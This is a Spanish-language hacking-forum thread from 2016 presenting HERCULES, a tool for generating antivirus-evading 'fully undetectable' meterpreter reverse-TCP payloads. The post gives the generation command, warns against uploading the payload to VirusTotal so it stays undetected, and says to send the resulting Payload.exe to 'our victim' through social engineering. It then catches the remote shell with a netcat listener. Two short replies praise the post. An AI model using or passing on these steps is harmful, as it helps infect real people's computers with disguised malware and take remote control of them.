HERCULES: Genera un payload y evade los antivirus

afravaz · Septiembre 09, 2016, 12:15:34 PM

Definición:

Hercules es una herramienta cuyo proposito es generar un payload fud (Fully Undetectable) que evade antivirus.

Antes de nada:

*POR FAVOR NO SUBAIS EL PAYLOAD A VIRUSTOTAL!, porque dejaría de ser FUD.

Tutorial:

Código: text

./HERCULES_x64 192.168.1.20 4444 –p windows/meterpreter/reverse_tcp –a x64 –l dynamic

"./HERCULES_x64 [IP LOCAL] [PUERTO] –p [PAYLOAD] –a [ARQUITECTURA] –l [LINKER]"

Se nos guardará un payload que tendrá el nombre de Payload.exe el cual enviaremos a nuestra victima mediante cualquier técnica de ingeniería social.
Crearemos un listener TCP con NetCat escribiendo el comando:

Código: text

nc –l –p [PUERTO]

+ Cabe destacar que también podremos poner un listenner de metasploit y ganar así una sesión meterpreter.
*NetCat: Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Ratio de detección:

Descarga:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Vídeo:

Pricker · Septiembre 09, 2016, 03:42:27 PM

Excelente aporte, lo probaré en mi lab.. y ver q pinta, gracias

Enviado desde mi XT1058 mediante Tapatalk

ro0tmag · Septiembre 09, 2016, 04:07:48 PM

Muy bueno! No conocía este tipo de herramientas.

Gracias

HERCULES: Genera un payload y evade los antivirus

afravaz

Septiembre 09, 2016, 12:15:34 PM Ultima modificación: Septiembre 12, 2016, 10:51:17 AM por afravaz

Pricker

Septiembre 09, 2016, 03:42:27 PM #1

ro0tmag

Septiembre 09, 2016, 04:07:48 PM #2